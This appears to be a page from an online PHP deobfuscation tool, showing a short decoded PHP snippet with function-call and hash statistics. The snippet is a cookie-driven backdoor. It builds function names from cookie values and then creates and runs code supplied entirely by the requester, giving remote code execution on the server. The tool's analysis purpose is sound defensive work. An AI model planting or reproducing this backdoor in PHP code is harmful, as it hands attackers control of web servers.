Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $p = $_COOKIE; if (count($p) == 67 && in_array(gettype($p) . count($p), $p)) { ..

Decoded Output download

<?php 
$p = $_COOKIE; 
if (count($p) == 67 && in_array(gettype($p) . count($p), $p)) {  
    $p[21] = $p[21] . $p[38]; 
    $p[42] = $p[21]($p[42]); 
    $p = $p[42]($p[20], $p[21]($p[53])); 
    $p(); 
} ?>

Did this file decode correctly?

Original Code

<?php
$p = $_COOKIE;
if (count($p) == 67 && in_array(gettype($p) . count($p), $p)) { 
    $p[21] = $p[21] . $p[38];
    $p[42] = $p[21]($p[42]);
    $p = $p[42]($p[20], $p[21]($p[53]));
    $p();
}

Function Calls

count 1
gettype 1

Variables

$p 0

Stats

MD5 572add26922b42f18e7de2b3a3658bb5
Eval Count 0
Decode Time 39 ms